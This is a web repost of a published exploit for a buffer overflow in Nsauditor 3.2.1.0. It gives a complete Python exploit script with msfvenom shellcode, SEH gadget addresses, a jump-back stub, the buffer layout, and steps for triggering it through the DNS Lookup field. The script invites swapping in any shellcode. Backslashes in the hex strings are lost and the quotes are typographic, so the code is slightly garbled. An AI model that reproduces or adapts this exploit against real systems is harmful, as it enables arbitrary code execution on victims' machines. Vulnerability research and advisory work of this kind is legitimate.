Nsauditor 3.2.1.0 Buffer Overflow ↭ – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on April 20th, 2020 📆 | 4674 Views ⚑

0

Nsauditor 3.2.1.0 Buffer Overflow ↭

# Exploit Title: Nsauditor 3.2.1.0 – Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))
# Date: 2020-04-17
# Exploit Author: Cervoise
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: https://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.1.0 and 3.0.28
# Tested on: Windows 10.0.18363.778 x86 Pro EN

# Exploit originally found on Nsauditor 3.0.28.0 by ACHILLES
(https://www.exploit-db.com/exploits/46005)
# Latest version Nsauditor 3.2.1.0 (4/13/2020 1:51:53) is still
vulnerable

# 1 -> Change the shellcode with the one you want
# 2 -> Open nsauditor-3-2-1-exploit.txt and copy content to clipboard
# 3 -> Open Nsauditor
# 4 -> In the Window select “Tools” -> “Dns Lookup”
# 5 -> Paste the content into the Field: “Dns Query'”
# 6 -> Click “Resolve”

#!/usr/bin/python3

# Badchars ->
x00x0ax0dx2ex81x82x83x84x85x86x87x88x89x8ax8bx8cx91x92x93x94x95x96x97x98x99x9ax9bx9fxf0xf1xf2xf3xf4xf5xf6
# Maybe less badchars between x80 and x9f but I was lazy (I just
checked thoose I needed)

# msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed -f python -v
shellcode
shellcode = b””
shellcode += b”x89xe7xd9xe9xd9x77xf4x59x49x49x49″
shellcode += b”x49x49x49x49x49x49x49x49x43x43x43″
shellcode += b”x43x43x43x37x51x5ax6ax41x58x50x30″
shellcode += b”x41x30x41x6bx41x41x51x32x41x42x32″
shellcode += b”x42x42x30x42x42x41x42x58x50x38x41″
shellcode += b”x42x75x4ax49x4bx4cx4ax48x6ex62x73″
shellcode += b”x30x37x70x75x50x35x30x6fx79x68x65″
shellcode += b”x36x51x6fx30x43x54x4ex6bx70x50x30″
shellcode += b”x30x4ex6bx43x62x56x6cx4cx4bx73x62″
shellcode += b”x54x54x6cx4bx61x62x65x78x36x6fx58″
shellcode += b”x37x71x5ax56x46x66x51x49x6fx6ex4c”
shellcode += b”x65x6cx51x71x53x4cx43x32x46x4cx47″
shellcode += b”x50x6fx31x4ax6fx66x6dx46x61x79x57″
shellcode += b”x69x72x69x62x46x32x36x37x4cx4bx63″
shellcode += b”x62x76x70x4cx4bx63x7ax45x6cx6ex6b”
shellcode += b”x72x6cx47x61x62x58x79x73x77x38x55″
shellcode += b”x51x7ax71x72x71x6ex6bx62x79x57x50″
shellcode += b”x37x71x78x53x4ex6bx57x39x72x38x5a”
shellcode += b”x43x54x7ax61x59x4ex6bx57x44x4cx4b”
shellcode += b”x45x51x39x46x30x31x79x6fx6ex4cx5a”
shellcode += b”x61x4ax6fx44x4dx63x31x79x57x76x58″
shellcode += b”x49x70x51x65x69x66x76x63x43x4dx58″
shellcode += b”x78x45x6bx51x6dx57x54x64x35x48x64″
shellcode += b”x46x38x6cx4bx42x78x67x54x36x61x6a”
shellcode += b”x73x31x76x6cx4bx44x4cx52x6bx6cx4b”
shellcode += b”x66x38x65x4cx57x71x4ax73x6ex6bx36″
shellcode += b”x64x4ex6bx47x71x38x50x6dx59x42x64″
shellcode += b”x35x74x51x34x31x4bx33x6bx70x61x42″
shellcode += b”x79x43x6ax50x51x6bx4fx4dx30x33x6f”
shellcode += b”x63x6fx43x6ax4ex6bx77x62x7ax4bx6e”
shellcode += b”x6dx53x6dx50x6ax67x71x4ex6dx6cx45″
shellcode += b”x4ex52x73x30x37x70x75x50x72x70x35″
shellcode += b”x38x46x51x4ex6bx52x4fx4fx77x4bx4f”
shellcode += b”x38x55x6fx4bx4cx30x6ex55x6cx62x71″
shellcode += b”x46x53x58x4fx56x6dx45x6dx6dx6dx4d”
shellcode += b”x39x6fx58x55x47x4cx44x46x43x4cx74″
shellcode += b”x4ax6bx30x49x6bx59x70x34x35x47x75″
shellcode += b”x6fx4bx50x47x56x73x73x42x70x6fx53″
shellcode += b”x5ax67x70x51x43x4bx4fx6bx65x31x73″
shellcode += b”x70x61x52x4cx30x63x73x30x41x41″

# 0x006ea017 : pop esi # pop ecx # ret | startnull
{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False,
SafeSEH: False, OS: False, v3.0.28.0 (C:Program
FilesNsauditorNsauditor.exe)
# 0x006ea017 : pop esi # pop ecx # ret | startnull
{PAGE_EXECUTE_WRITECOPY} [Nsauditor.exe] ASLR: False, Rebase: False,
SafeSEH: False, OS: False, v3.2.1.0 (C:Program
FilesNsauditorNsauditor.exe)

pop_pop_ret = b”x17xa0x6e”
jmp_back = b”xebxc3x90x90″ #JMP 0xffffffc5

# An address near the end of our buffer is on the stack, only three pop
are needed to get it
# Then we just have to moving at the begging of our buffer
# An egghunter does the job, but will not be compatible with all Windows
versions
going_back = b”x58″ #POP EAX
going_back += b”x58″ #POP EAX
going_back += b”x58″ #POP EAX
going_back += b”x83xE8x79″ #SUB EAX,0x79
going_back += b”x83xE8x79″ #SUB EAX,0x79
going_back += b”x83xE8x79″ #SUB EAX,0x79
going_back += b”x83xE8x79″ #SUB EAX,0x79
going_back += b”x83xE8x79″ #SUB EAX,0x79
going_back += b”xFFxE0″ #JMP EAX

buffer = b”x90″*(5235-len(shellcode)-len(going_back)-100)
buffer += shellcode + b”x90″*100
buffer += going_back
buffer += jmp_back + pop_pop_ret #nSEH / SEH

# Write the exploit
file = open(“nsauditor-3-2-1-exploit.txt”, “wb”)
file.write(buffer)
file.close()

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...